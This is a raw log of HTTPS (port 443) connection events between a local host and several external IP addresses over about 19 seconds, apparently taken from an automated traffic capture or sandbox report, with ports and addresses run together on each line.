                                                                                              Dec 19, 2024 14:36:05.297264099 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.302185059 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.302273035 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.307878971 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.307992935 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.310517073 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.310586929 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.310597897 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.310664892 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.310697079 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.310784101 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.311841011 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.311841011 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.311856985 CET44349776104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.311980963 CET49776443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.322410107 CET49784443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.322493076 CET44349784104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.322562933 CET49784443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.322948933 CET49784443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.322988033 CET44349784104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.326488972 CET49781443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:05.948415041 CET49787443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.948463917 CET44349787104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:05.948543072 CET49787443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.948796034 CET49787443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:05.948808908 CET44349787104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:06.244910002 CET44349781172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:36:06.245090008 CET44349781172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:36:06.246520996 CET49781443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:06.247096062 CET49781443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:36:06.247138023 CET44349781172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:36:06.384589911 CET49791443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:06.384632111 CET4434979135.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:06.384697914 CET49791443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:06.385118008 CET49791443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:06.385138035 CET4434979135.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:06.568335056 CET44349784104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:06.568639040 CET49784443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:06.568659067 CET44349784104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:06.569111109 CET44349784104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:06.569402933 CET49784443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:06.569483042 CET44349784104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:06.569545984 CET49784443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:06.611380100 CET44349784104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.017760038 CET44349784104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.017844915 CET44349784104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.017930031 CET49784443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:07.018382072 CET49784443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:07.018423080 CET44349784104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.178709984 CET44349787104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.181880951 CET49787443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:07.181906939 CET44349787104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.183043957 CET44349787104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.183490038 CET49787443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:07.183681965 CET44349787104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.183715105 CET49787443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:07.227008104 CET49787443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:07.227024078 CET44349787104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.609895945 CET4434979135.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.610136032 CET49791443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:07.610162973 CET4434979135.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.611363888 CET4434979135.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.611438990 CET49791443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:07.612452984 CET49791443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:07.612521887 CET4434979135.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.612673044 CET49791443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:07.612683058 CET4434979135.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.635217905 CET44349787104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.635471106 CET44349787104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.635536909 CET49787443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:07.635962963 CET49787443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:07.636012077 CET44349787104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.648283958 CET49794443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:07.648333073 CET44349794104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.648427010 CET49794443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:07.648617029 CET49794443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:07.648638010 CET44349794104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.659455061 CET49791443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:07.926203966 CET49795443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:07.926285982 CET44349795104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:07.926373959 CET49795443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:07.926733971 CET49795443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:07.926763058 CET44349795104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:08.214585066 CET4434979135.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:08.214797020 CET4434979135.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:08.214811087 CET49791443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:08.214832067 CET4434979135.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:08.214858055 CET49791443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:08.214886904 CET49791443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:08.215339899 CET49796443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:08.215374947 CET4434979635.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:08.215445042 CET49796443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:08.215660095 CET49796443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:08.215671062 CET4434979635.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.153599024 CET44349794104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.153842926 CET49794443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:09.153873920 CET44349794104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.154300928 CET44349794104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.154628038 CET49794443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:09.154696941 CET44349794104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.154871941 CET49794443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:09.195326090 CET44349794104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.259599924 CET44349795104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.259851933 CET49795443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:09.259861946 CET44349795104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.260313034 CET44349795104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.260610104 CET49795443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:09.260689020 CET44349795104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.260765076 CET49795443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:09.303344965 CET44349795104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.432363033 CET4434979635.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.432630062 CET49796443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:09.432655096 CET4434979635.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.433847904 CET4434979635.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.434155941 CET49796443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:09.434293985 CET49796443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:09.434304953 CET4434979635.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.434334040 CET4434979635.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.480272055 CET49796443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:09.596919060 CET44349794104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.597160101 CET44349794104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.597245932 CET49794443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:09.598090887 CET49794443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:09.598133087 CET44349794104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.704514027 CET44349795104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.704906940 CET44349795104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.704952955 CET49795443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:09.704963923 CET44349795104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.704991102 CET44349795104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.705030918 CET49795443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:09.705646992 CET49795443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:09.705667973 CET44349795104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.794846058 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:09.794883966 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.794955015 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:09.795830011 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:09.795845032 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.893693924 CET4434979635.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.893932104 CET4434979635.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:09.893986940 CET49796443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:09.898335934 CET49796443192.168.2.635.190.80.1
                                                                                              Dec 19, 2024 14:36:09.898359060 CET4434979635.190.80.1192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.014796019 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.015054941 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.015080929 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.016211033 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.016499996 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.016639948 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.016644955 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.016675949 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.016712904 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.016740084 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.016792059 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.019268990 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.019290924 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.481430054 CET49808443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:11.481522083 CET4434980820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.481599092 CET49808443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:11.482186079 CET49808443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:11.482223034 CET4434980820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.621109009 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.621428013 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.621515989 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.621512890 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.621552944 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.621611118 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.622426033 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.628747940 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.628818035 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.628829002 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.637185097 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.637250900 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.637259960 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.645510912 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.645577908 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.645586967 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.687786102 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.740590096 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.795227051 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.812439919 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.816621065 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.816684961 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.816699982 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.828114033 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.828164101 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.828174114 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.836484909 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.836536884 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.836544991 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.844954014 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.845005989 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.845021963 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.845119953 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.845166922 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.845349073 CET49802443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.845365047 CET44349802104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.871401072 CET49809443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.871429920 CET44349809104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:11.871495962 CET49809443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.871726990 CET49809443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:11.871741056 CET44349809104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:13.147269011 CET44349809104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:13.147584915 CET49809443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:13.147614956 CET44349809104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:13.148204088 CET44349809104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:13.148567915 CET49809443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:13.148650885 CET44349809104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:13.148746967 CET49809443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:13.191364050 CET44349809104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:13.591837883 CET44349809104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:13.591924906 CET44349809104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:13.592678070 CET49809443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:13.593576908 CET49809443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:13.593595982 CET44349809104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:13.716391087 CET4434980820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:13.720113993 CET49808443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:13.724881887 CET49808443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:13.724921942 CET4434980820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:13.725791931 CET4434980820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:13.727546930 CET49808443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:13.727596998 CET49808443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:13.727610111 CET4434980820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:13.727706909 CET49808443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:13.771377087 CET4434980820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:14.390286922 CET4434980820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:14.390389919 CET4434980820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:14.390480042 CET49808443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:14.390650988 CET49808443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:14.390697002 CET4434980820.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:17.134293079 CET49820443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:17.134339094 CET44349820104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:17.134397030 CET49820443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:17.134876966 CET49820443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:17.134897947 CET44349820104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:18.344909906 CET44349820104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:18.345149994 CET49820443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:18.345181942 CET44349820104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:18.345627069 CET44349820104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:18.345933914 CET49820443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:18.346014023 CET44349820104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:18.346062899 CET49820443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:18.346132040 CET49820443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:18.346163034 CET44349820104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:18.346271992 CET49820443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:18.346295118 CET44349820104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:18.961519957 CET44349820104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:18.961719036 CET44349820104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:18.961823940 CET49820443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:18.961849928 CET44349820104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:18.962280035 CET44349820104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:18.962330103 CET49820443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:18.962337971 CET44349820104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:18.963737011 CET44349820104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:18.963792086 CET49820443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:18.974210024 CET49820443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:18.974230051 CET44349820104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:19.009229898 CET49826443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:19.009351015 CET44349826104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:19.009434938 CET49826443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:19.009793997 CET49826443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:19.009830952 CET44349826104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:19.403645992 CET49828443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:19.403700113 CET44349828104.21.18.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:19.403780937 CET49828443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:19.404062033 CET49828443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:19.404074907 CET44349828104.21.18.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:20.220624924 CET44349826104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:20.221124887 CET49826443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:20.221153021 CET44349826104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:20.221620083 CET44349826104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:20.221983910 CET49826443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:20.222064972 CET44349826104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:20.222104073 CET49826443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:20.263339043 CET44349826104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:20.263926983 CET49826443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:20.620829105 CET44349828104.21.18.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:20.621330976 CET49828443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:20.621409893 CET44349828104.21.18.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:20.625013113 CET44349828104.21.18.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:20.625133038 CET49828443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:20.625493050 CET49828443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:20.625493050 CET49828443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:20.625557899 CET49828443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:20.625683069 CET44349828104.21.18.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:20.625756025 CET49828443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:20.625941038 CET49833443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:20.625993013 CET44349833104.21.18.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:20.626051903 CET49833443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:20.626257896 CET49833443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:20.626271009 CET44349833104.21.18.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:20.666598082 CET44349826104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:20.666726112 CET44349826104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:20.666953087 CET49826443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:20.667545080 CET49826443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:20.667568922 CET44349826104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:21.846477985 CET44349833104.21.18.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:21.847476006 CET49833443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:21.847487926 CET44349833104.21.18.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:21.848915100 CET44349833104.21.18.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:21.848968029 CET49833443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:21.850258112 CET49833443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:21.850332975 CET44349833104.21.18.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:21.850480080 CET49833443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:21.850486994 CET44349833104.21.18.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:21.904495955 CET49833443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:22.713763952 CET44349833104.21.18.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:22.713901043 CET44349833104.21.18.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:22.720508099 CET49833443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:22.721831083 CET49833443192.168.2.6104.21.18.132
                                                                                              Dec 19, 2024 14:36:22.721856117 CET44349833104.21.18.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:22.883786917 CET49839443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:22.883872986 CET44349839172.67.181.220192.168.2.6
                                                                                              Dec 19, 2024 14:36:22.883959055 CET49839443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:22.884588003 CET49839443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:22.884615898 CET44349839172.67.181.220192.168.2.6
                                                                                              Dec 19, 2024 14:36:24.094857931 CET44349839172.67.181.220192.168.2.6
                                                                                              Dec 19, 2024 14:36:24.096183062 CET49839443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:24.096249104 CET44349839172.67.181.220192.168.2.6
                                                                                              Dec 19, 2024 14:36:24.097726107 CET44349839172.67.181.220192.168.2.6
                                                                                              Dec 19, 2024 14:36:24.097799063 CET49839443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:24.098561049 CET49839443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:24.098599911 CET49839443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:24.098642111 CET49839443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:24.098684072 CET44349839172.67.181.220192.168.2.6
                                                                                              Dec 19, 2024 14:36:24.098741055 CET49839443192.168.2.6172.67.181.220
                                                                                              Dec 19, 2024 14:36:24.099287033 CET49843443192.168.2.6172.67.181.220
